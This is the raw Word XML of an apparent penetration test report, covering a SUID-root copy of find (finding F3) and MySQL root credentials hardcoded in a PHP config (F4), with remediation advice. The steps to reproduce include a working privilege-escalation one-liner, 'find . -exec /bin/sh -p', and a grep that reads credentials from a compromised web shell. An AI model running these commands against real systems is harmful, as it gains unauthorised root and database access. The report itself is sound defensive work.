              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41FA0FB7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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FE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3139B1AE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>7.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D621DA8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0818676A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cassandra-stg-01 (10.42.7.15), /usr/local/bin/find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="692EC901" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E21576" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity justification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS 7.8 High. Local attack vector and Privileges Required: Low, requiring an existing foothold (the engagement's precondition). Scope is Unchanged because the privilege gained is host-level. The finding is rated below F1 not because the impact is less severe — both produce root — but because the attacker must first identify the non-standard binary among 24 standard SUID files, which takes longer in practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E317F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DC8FB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc229906586"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="3E33F19E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The host carries a SUID-root binary at /usr/local/bin/find that is byte-identical to /usr/bin/find but placed in a location not managed by the dpkg package manager. The binary has the SUID bit set with owner root, meaning that any user invoking it gains root effective UID for the duration of the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C90939" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The GNU find command supports the -exec primitive, which spawns child processes that inherit the parent's effective UID. With the -p flag passed to /bin/sh, the child shell preserves the inherited euid=0 instead of dropping privileges. The combination yields a euid-0 shell from an unprivileged caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073ACD7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The presence of this binary at this location is not consistent with a stock Debian or Ubuntu installation; dpkg -S /usr/local/bin/find reports that no package owns the file. This is an operational artefact added outside package management, which is itself an audit-trail signal and a deviation from configuration baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAABD7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc229906587"/>
      <w:r>
        <w:t>Steps to reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="245F3AFD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ find / -perm -4000 -type f 2&gt;/dev/null &gt; suid_inventory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466B441" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ wc -l suid_inventory.txt    # → 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E123C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ ls -la /usr/local/bin/find  # → -rwsr-xr-x 1 root root ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE3B92" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ /usr/local/bin/find . -exec /bin/sh -p \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E303D95" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># id  →  uid=1000(msfadmin) euid=0(root) groups=...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB76C65" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc229906588"/>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="46C654C7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="478E5119" wp14:editId="39CA040C">
            <wp:extent cx="5334000" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="497537815" name="Picture 49753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95600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF3A53" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure 4.3.1: SUID inventory of cassandra-stg-01 — 25 binaries total, with /usr/local/bin/find as the single outlier whose path is not part of the standard Debian SUID set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D486F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc229906589"/>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="67B0B2B2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remove /usr/local/bin/find within seven days, either by `rm` or by dropping the SUID bit (chmod -s). If the operational need that motivated installing this file still exists, replace it with a wrapper script in /usr/local/sbin/ (a sbin path is conventional for administrative tools and is not in normal users' default PATH). Additionally, mount /tmp and /var/tmp with the nosuid flag (an /etc/fstab change) so that even if an attacker plants a SUID binary in those writable locations, the kernel ignores the bit. Reference: CIS Debian Benchmark v3.0, Section 1.1.x (mount options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C457EB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc229906590"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="076D9283" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GTFOBins (find entry, SUID section); CWE-732 Incorrect Permission Assignment for Critical Resource; MITRE ATT&amp;CK T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A71A7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc229906591"/>
      <w:r>
        <w:t>Finding F4: Database administrator credentials hardcoded in vendor application configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="6D06CC46" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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600"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="24BE3D40" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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38D78F41" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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409F8F66" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS v3.1 base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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444D0D47" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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5B0332BC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Affected asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2579F609"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E9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="314089C2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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FE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13F19239" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="358357C5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ACAE9DA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01 (10.42.8.22), /home/www/vendor-eval-01.com/gallery/gconfig.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52E086B1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C22D3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity justification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS 7.5 High. The credentials become accessible to anyone who reaches the file via the network (through the LotusCMS vulnerability F2 or a future similar one). Confidentiality of the entire MySQL instance is at stake; integrity and availability are not directly affected by the credential leak itself, although they become reachable through the database session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0A90F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059264F7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc229906592"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5C381A44" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application stores its database connection parameters in a PHP file under the document root. The file assigns the MySQL username and password to global variables in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>plain text. The password is stored verbatim and is identical to the production-style MySQL root password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5487EE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The web server process (www-data) requires read access to gconfig.php to function. Any vulnerability that grants file-read or code-execution privilege to the web server account (such as F2) therefore also grants MySQL root privileges in a single read operation. The defence-in-depth principle that a web-application compromise should not trivially escalate to database administrator is violated here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF9E83" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The application also stores its own user passwords in the database table dev_accounts using unsalted MD5 — this is described as a separate finding (F5) because the underlying defect (weak hashing) is conceptually distinct from credential placement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA0D464" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc229906593"/>
      <w:r>
        <w:t>Steps to reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="2400E123" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># (from www-data shell obtained via F2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9C944" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ grep -i mysql_ /home/www/vendor-eval-01.com/gallery/gconfig.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B0F77" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># → $GLOBALS["gallarific_mysql_username"] = "root";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD394C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># → $GLOBALS["gallarific_mysql_password"] = "&lt;password&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BF61F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
